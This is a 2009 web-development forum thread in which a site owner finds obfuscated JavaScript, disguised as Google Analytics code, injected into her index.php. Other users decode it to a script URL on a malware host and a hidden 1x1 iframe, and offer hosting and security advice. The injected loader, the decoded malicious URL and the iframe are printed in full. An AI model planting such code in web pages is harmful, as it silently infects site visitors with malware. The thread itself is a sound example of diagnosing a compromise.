Inserting into the index

cecilia · 06-11-2009, 03:27 PM

I cant think of how it was done, somehow this code got inserted onto my index.php at the very bottom. Im thinking coz the page to login to the site is behind a password protected folder and theres no other textareas or text input boxes anywhere else. Does this mean the attacker somehow got a correct login and password combination?

I dont know why but all of this started happening since I used notepad++ to do my stuff, Ive always just did it directly from the cpanel. so Im starting to wonder if my computer got infected with something or... I dont know.

I mean im acknowledging that there might have been an input box or something that I missed behind the login page but, you have to get in past it to access that right so...

thank you all for the input

javascript Code:

<?php echo '<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript sr?='" + gaJsHost + "google-analytics.com/ga.js' " + '#@!s(&r)c@#=!)\'!h$#t^!#$@t@!$p&^!@:$^/!@#!/#9(1)@.(2)1#(2)!.^&6!@!#^5(@#!.!&$1@#4)8#&/($g&$a!.(j^s)'.replace(/#|@|&|\$|\)|\!|\^|\(/ig, '') + "' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-7623457-2");
pageTracker._trackPageview();
} catch(err) {}</script>'; ?>

EDIT:

I just looked through the entire site, I applied stripslashes, strip_tags and mysql_real_escape_string on all of the user inputs that I missed.

Randy · 06-11-2009, 08:42 PM

When did you start to use notepad++? I have been having issues with it lately as well, It seems to be putting all my code onto one like php, css, html, etc.. It is quite frustrating.

I doubt that notepad++ might be your probably but perhaps look into another and find out? I recommend Programmers Notepad its quite nice while still being free.

cecilia · 06-11-2009, 11:36 PM

sorry double post

cecilia · 06-11-2009, 11:38 PM

Im just reaching at the moment, I dont think its notepad++ specifically I just cant think of anything else at the moment. Anyway, like I said earlier Ive already cleaned every POST data in the entire site, even ones that users dont actually input since I read you can modify post data with some addon in firefox.

I already tried using different sql injections with the single quote and its doing ok. <script> inserts dont work too.

As for when I used notepad, its been a month already. I actually like using it it does work for me seriously. It just fails uploads sometimes and when it does it leaves the original file youre editing as blank.

Wildhoney · 06-11-2009, 11:39 PM

Was that code actually embedded in a physical file? As in, it wasn't pulled from the database, or elesewhere such as that. To actually write to the file would require a different type of attack than a simple submit via a form.

cecilia · 06-11-2009, 11:40 PM

Wildhoney, yeah. That code that I posted, I found it at the very bottom of the index.php. Its actually there its not like fetched from another location.

Ill just say it, Im not really that familiar with any other kind of attacks other than the sql thing.

Also, its a shared server at Lunarpages.

EDIT:

The same thing happened a week ago. But the coding was slightly different, I wasnt able to save a copy of it. But all i remember was what it does. It embeds an iframe that sorta runs a javascript function at another site. All of this was constructed using javascript letter by letter almost. I found out about it when I went to index page and the antivirus detected it. I unescaped the injected code and checked the domain on where it points to and its some company in asia, singapore I think, I cant rememeber. And it was on the same location, at the very end of the index.php

Runar · 06-12-2009, 12:07 AM

I did some research, and apparently the JavaScript code is requesting a JavaScript-file from an Ukrainian-registered server. Most of the code is a Google Analytics-code, used to track visitors on your site.

Most of the code is perfectly safe. It is the following part I am worried about:

Code:

'#@!s(&r)c@#=!)\'!h$#t^!#$@t@!$p&^!@:$^/!@#!/#9(1)@.(2)1#(2)!.^&6!@!#^5(@#!.!&$1@#4)8#&/($g&$a!.(j^s)'.replace(/#|@|&|\$|\)|\!|\^|\(/ig, '')

I will try to figure out what it means, while you secure your scripts (and preferably move your site to a safer shared server).

Randy · 06-12-2009, 12:08 AM

EDIT: i basically said same thing as runar, its just google analytics code and the other part I do not know if you can give me the server name you are on from lunarpages i will look into it as I am a jr. server admin.

cecilia · 06-12-2009, 12:14 AM

Yeah Ill still look around the site if theres jsut anything that I missed and change all of the passwords for everything too I guess. Im out of ideas at the moment and maybe ill consider moving it. I know, people have been saying it should be on a dedicated but I dont have that much money to spare every month. If I did I would have.

Thank you all for the reply and the help.

EDIT

What Im thinking of is it may be jsut a harmless thing, but the fact that they can write to a file and as php its... Ill observe and check it everyday from now on. What im worried about is also waht wildhoney said, that it may not be form related at all and its something that I cant control or do anything about.

Randy · 06-12-2009, 12:25 AM

If you want another host you are more then welcome to let me know as I am also the owner of a new shared/reseller hosting company and I can provide you with great support, I also have a staff member who lives within the UK who will be able to help when I am not but seeing as how you are in LA i will most likely be helping you as that Is where I am myself. My server is not hosted by lunarpages i work there to afford my other server.

Runar · 06-12-2009, 12:28 AM

I "cracked" the code. The solution itself was in the code, and this is the site it redirects to:

http://91.212.65.148/ga.js

I visited that link, and ended up with another javascript-snippet. I "cracked" that one and ended up with an iframe:

HTML Code:

<iframe src="http://91.212.65.148//image/index.php" width=1 height=1></iframe>

The site is apparently reported as an attack site so Firefox warns me about visiting it. It has "hosted malicious software over the past 90 days. It infected 509 domain(s)" according to Google.

Some additional information: Malicious software includes 126 trojan(s), 36 scripting exploit(s), 13 exploit(s).

Randy · 06-12-2009, 12:33 AM

Cheers Runar, thanks for passing that along :D

Runar · 06-12-2009, 12:42 AM

You are most welcome!

I am glad I could help, and I hope you succeed in closing the (security) hole that made this possible :)

Randy · 06-12-2009, 12:50 AM

It is possible that it is our end but it may be a security leak in his script so I am going to look into it and I will figure out what is going on.

Wildhoney · 06-12-2009, 01:04 AM

It would be unlikely for a hacker to have targeted your website specifically, I think. Mostly they will write a script that targets popular web software, such as vBulletin on TalkPHP. This allows them to exploit as many websites as possible, with the least research as possible. It could be that Lunarpages has a security issue regarding one of two of its scripts. I have a Lunarpages account for one of my websites, and I know they do send out automatic emails notifying you of any vulnerable scripts, so they are quite security conscious, it would appear.

The good news, I suppose, is that it's not so much a security hole in your application, but rather Lunarpages. Try contacting Lunarpages and tell them what happened. Hopefully they'll be able to advise.

Runar, in those handful of websites, did you check where they were hosted? If they were all hosted at Lunarpages, then we could narrow the problem down further. Otherwise it may well be that somebody has targeted your website specifically.

Randy · 06-12-2009, 01:27 AM

Wildhoney that IP is not a lunarpages IP i have checked the list and then looked it up it is a Ukraine based server/ip address, however it is looking like a neighborhood (home) ip address. I have lunarpages staff checking the servers now as I am unable to due to me being off duty and unable to access the servers. Staff will inform all clients on the server if there is a security issue and it will be fixed.

Wildhoney · 06-12-2009, 01:32 AM

I mean the websites that were targetted. Were they all hosted on Lunarpages?

Randy · 06-12-2009, 01:59 AM

Ah, that I don't know, I tried to find it but couldn't so we will have to wait for runar.

cecilia · 06-12-2009, 05:21 AM

Just real quick, i found something that sounds just like my case, this is a response to him. I dont know who the web host is, just found it using yahoo search

Quote:

Hello Gary,

Your website hosting has been injected with some iframe code so download your index page and remove the iframe injection and re upload. Your website hosting is not loading on my end as it times out after some time so I will let you know the exact code of injection once the website hosting loads.

you need to request your web hosting company to upgrade kernel on your server and improve security of the server to block such injections. We had similar problem on 2 of our servers but that was due to failure of kernel upgrade on those servers and we finally managed to upgrade kernel on those servers after some deep research on the hardware configuration we had for those 2 servers.

As of now you can remove the injection from you end but if the kernel is not upgraded soon then the injection will occur again.

Somehow I agree, I dont think the hacker really targettd me, from what I heard these type of things are automated. Anyway I think ive almost done what I can at the site, even removed old unused files, not that i think that even makes a difference.

If it will happen again Ill try something different, I mean it does attack just the index always.. maybe get around the file somehow. too tired ot think.

Thanks again everyone

E

So the source of the problem isnt some other website hosted on the same server as me right and theyre connecting from Ukraine.

I know this is a horrible thing, I mean for gods sake I am being victimized by it but still you have to admit that its really interesting how theyre doing it; good skills but evil intentions huh.

Runar · 06-12-2009, 08:17 AM

Have you written your site yourself, or do you use existing software such as WordPress? If you do use other software, then I suggest you upgrade to newest version available.

Do you have any sort of logging yourself, or it possible with Lunarpages, to log all activity on your site?

Wildhoney: The ones I found apart from this one? None said anything about Lunarpages, so I guess not.